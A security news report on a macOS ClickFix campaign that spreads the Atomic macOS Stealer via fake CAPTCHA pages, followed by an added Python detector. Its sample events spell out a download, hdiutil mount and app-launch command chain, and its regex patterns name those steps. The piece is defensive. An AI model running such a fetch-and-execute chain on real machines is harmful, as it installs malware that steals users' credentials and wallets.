A new macOS ClickFix campaign is using Terminal commands to silently download, mount, and launch info-stealing malware from malicious disk image (DMG) files.
The campaign is infecting Mac devices with the Atomic macOS Stealer (AMOS) infostealer, which steals browser credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents.
Researchers at Palo Alto Networks Unit 42 first discovered the campaign and say it begins with a fake CAPTCHA page that tells users to open Terminal and paste a malicious command to verify themselves.
Once executed, the command downloads a DMG file from an attacker-controlled server, silently mounts it with macOS's native hdiutil utility, locates the application bundle it contains, and launches it automatically.
ClickFix is a social engineering technique that displays fake CAPTCHAs, browser errors, or system alerts to trick visitors into copying and executing attacker-supplied "fix instructions." The technique has grown in popularity among threat actors in the past year and has been used by both cybercriminals and state-sponsored hacking groups to distribute malware.
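The download, mount and launch chain described above, as a detection example added here (not code from the Unit 42 report): it scans process-execution events, grouped by shell session, for a Terminal-originated DMG download followed within a short window by an hdiutil attach and the launch of an .app from a mounted volume. The event field names and the sample events are constructed assumptions, not a real EDR schema.

```python
# Added example: flag the ClickFix chain (DMG download -> hdiutil attach -> launch
# of an .app from /Volumes) inside one Terminal-originated shell session.
# Event schema (assumed): ts = epoch seconds, session = shell session id,
# origin = responsible GUI app, cmd = full command line.
import json
import re
from collections import defaultdict

DMG_DOWNLOAD = re.compile(r"\b(curl|wget)\b.*\.dmg\b", re.I)
HDIUTIL_ATTACH = re.compile(r"\bhdiutil\s+attach\b", re.I)
OPEN_FROM_VOLUME = re.compile(r"\bopen\b.*(/Volumes/[^ ]+\.app)", re.I)
WINDOW_SECONDS = 120  # all three stages must occur within this window


def detect_clickfix_chain(events):
    """Return [(session_id, launched_app_path)] for each session showing
    download -> attach -> launch, started from a Terminal session."""
    by_session = defaultdict(list)
    for ev in events:
        by_session[ev["session"]].append(ev)
    hits = []
    for sid, evs in by_session.items():
        evs.sort(key=lambda e: e["ts"])
        stage, start = 0, None
        for ev in evs:
            cmd = ev["cmd"]
            if stage == 0 and ev.get("origin") == "Terminal" and DMG_DOWNLOAD.search(cmd):
                stage, start = 1, ev["ts"]          # stage 1: DMG fetched from the shell
            elif stage == 1 and HDIUTIL_ATTACH.search(cmd) and ev["ts"] - start <= WINDOW_SECONDS:
                stage = 2                            # stage 2: image mounted via hdiutil
            elif stage == 2 and ev["ts"] - start <= WINDOW_SECONDS:
                m = OPEN_FROM_VOLUME.search(cmd)
                if m:                                # stage 3: bundle launched from the mount
                    hits.append((sid, m.group(1)))
                    stage = 3
    return hits


# Constructed sample events: s1 is the suspicious chain, s2 is an ordinary
# Finder-driven install (no Terminal download step) and must not be flagged.
SAMPLE_EVENTS = [json.loads(line) for line in """
{"ts": 1000, "session": "s1", "origin": "Terminal", "cmd": "curl -o /tmp/Installer.dmg https://example.invalid/dl"}
{"ts": 1002, "session": "s1", "origin": "Terminal", "cmd": "hdiutil attach /tmp/Installer.dmg"}
{"ts": 1004, "session": "s1", "origin": "Terminal", "cmd": "open /Volumes/Installer/Installer.app"}
{"ts": 2000, "session": "s2", "origin": "Finder", "cmd": "hdiutil attach /Users/me/Downloads/Editor.dmg"}
{"ts": 2010, "session": "s2", "origin": "Finder", "cmd": "open /Volumes/Editor/Editor.app"}
""".strip().splitlines()]

if __name__ == "__main__":
    for sid, app in detect_clickfix_chain(SAMPLE_EVENTS):
        print(f"ClickFix-style DMG chain in session {sid}: launched {app}")
```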